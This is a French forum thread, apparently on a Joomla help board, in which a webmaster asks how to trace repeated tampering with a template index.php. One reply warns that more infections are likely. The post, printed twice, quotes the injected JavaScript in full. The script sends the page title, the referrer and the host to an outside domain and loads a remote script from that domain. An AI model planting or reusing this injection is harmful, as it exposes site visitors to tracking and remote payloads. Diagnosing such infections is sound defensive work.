Tweet
Bonjour,
j'ai eu plusieurs sites hackés, suite (je pense) à un retard de mise à jour de Joomla 3.4.5.
Depuis je fais les mises à jours plus régulièrement, bien que cela me pose souvent des soucis de compatibilité sur des composants que je développe moi-même.
La plupart du temps une réinstallation de Joomla avec la BDD existance et un changement de mots de passe, protection htaccess semble avoir suffi.
Par contre j'ai un site qui continue à etre hacké.
le hack n'es tpas bien méchant
c'est une injection au de l'index.php du template (protostar standard de plus)
qui insère
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://global-adventure.home.pl/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
Une idée pour essayer de trouver ce qui le fait changer ? un utilitaire pour surveiller son changement , par quel user, quel process ?
je suis sous serveur dédié Ubuntu avec apache, j'ai accès à tous les logs...
L'idéal serait déjà de savoir quand le fichier a été changé et ensuite regarder peut etre les logs précédants.
La date du fichier reste malheureusmenet inchangée, alors que le fichier l'est bien lui, évidemment.
Merci de vos conseils.
j'ai eu plusieurs sites hackés, suite (je pense) à un retard de mise à jour de Joomla 3.4.5.
Depuis je fais les mises à jours plus régulièrement, bien que cela me pose souvent des soucis de compatibilité sur des composants que je développe moi-même.
La plupart du temps une réinstallation de Joomla avec la BDD existance et un changement de mots de passe, protection htaccess semble avoir suffi.
Par contre j'ai un site qui continue à etre hacké.
le hack n'es tpas bien méchant
c'est une injection au de l'index.php du template (protostar standard de plus)
qui insère
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://global-adventure.home.pl/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
Une idée pour essayer de trouver ce qui le fait changer ? un utilitaire pour surveiller son changement , par quel user, quel process ?
je suis sous serveur dédié Ubuntu avec apache, j'ai accès à tous les logs...
L'idéal serait déjà de savoir quand le fichier a été changé et ensuite regarder peut etre les logs précédants.
La date du fichier reste malheureusmenet inchangée, alors que le fichier l'est bien lui, évidemment.
Merci de vos conseils.
Oui, je te souhaite un tel miracle. Note que je n'ai jamais nettoyé un site où il n'y avait qu'un seul virus et seulement présent dans les index.php. Peut-être auras-tu cette chance 
Commentaire